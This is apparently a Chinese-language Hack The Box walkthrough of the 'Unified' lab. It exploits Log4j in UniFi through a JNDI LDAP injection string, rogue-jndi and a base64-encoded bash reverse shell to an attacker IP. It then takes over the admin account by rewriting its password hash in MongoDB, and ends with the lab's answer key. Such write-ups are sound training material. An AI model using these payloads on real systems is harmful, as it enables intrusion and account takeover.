HTB -Unified
Log4j CVE-202144228
1.端口扫描获得22,6789,8080,8443
2.访问8080端口后跳转8443端口,此端口web页面发现存在unified的cms ,通过搜索相关CMS Exploit 发现cms6.4.54版本存在Log4j漏洞
3.Log4j 语句构造,抓包重放验证Log4j漏洞是否存在payload
抓取的数据包内容修改remmber添加以下内容:
${jndi:ldap://10.10.14.26/whatever}
ldap 轻量级目录访问协议,默认端口389,如果存在漏洞发送payload消息,会发送数据报文到本机389端
4.TCPdump
监听389报文内容,数据内容说明目标主机通过49190端口来访问本机ldap端口,证明存在此漏洞
5.Log4j漏洞利用
准备工具:
1.openjdk-11-jdk
sudo apt-get install openjdk-11-jdk -y
2.Maven
sudo apt-get install maven -y
3.编译maven
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package
rogue-jndi:开启本机ldap服务,允许接收其他服务器数据,可执行代码
5.1 反弹shell
echo 'bash -c bash -i >&/dev/tcp/10.10.14.26/10086 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTAwODYgMD4mMQo=
5.2 构建payload
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTAwODYgMD4mMQo=}|
{base64,-d}|{bash,-i}" --hostname "10.10.14.26"
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTAwODYgMD4mMQo=
java -jar RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.26"
5.3 burp发送payload 后返回请求获得shell
5.4 nc -lvnp 4444
监听反弹shell获得user权限
6.提权
查看mongdb端口情况ps aux | grep mongo
,因为unifi 中间件默认的是mongdb数据库,通过远程代码执行修改数据库信息)
Mongdb 数据库是以json的格式作为存储内容,可以通过远程连接后就可以修改数据库内容
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
mongodb 默认数据库ace 通过unifi 条件语句查询ace
查询发现administrator的账户信息以及密码的加密信息
7.加密方式判别 Hashid 单引号转义后判断为 SHA-512加密方法
8.替换administrator hash 登录后台
生成sha512的密钥,替换mongdb中的administrator的密钥
通过mongo nosql语句进行替换
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$bddGuhm3UqXNoZ9p$We07yFxehCTxPqOKpKsGcu09nsS5fkauC1cD8dgQ3sjuKColLuPgia5ZjBTK0M17qe7yn6Fk7srqhDVZMfGZW1"}})'
9.登录后台,发现root开启了ssh 并且密码可视
10.Get flag
TASK
1.Which are the first four open ports?
22,6789,8080,8443
2.What is title of the software that is running running on port 8443?
unifi network
3.What is the version of the software that is running?
6.4.54
4.What is the CVE for the identified vulnerability?
CVE-2021-44228
5.What protocol does JNDI leverage in the injection?
ldap
6.What tool do we use to intercept the traffic, indicating the attack was successful?
tcpdump
7.What port do we need to inspect intercepted traffic for?
389
8.What port is the MongoDB service running on?
27117
9.What is the default database name for UniFi applications?
ace
10.What is the function we use to enumerate users within the database in MongoDB?
db.admin.find()
11.What is the function we use to update users within the database in MongoDB?
db.admin.update()
12.What is the password for the root user?
NotACrackablePassword4U2022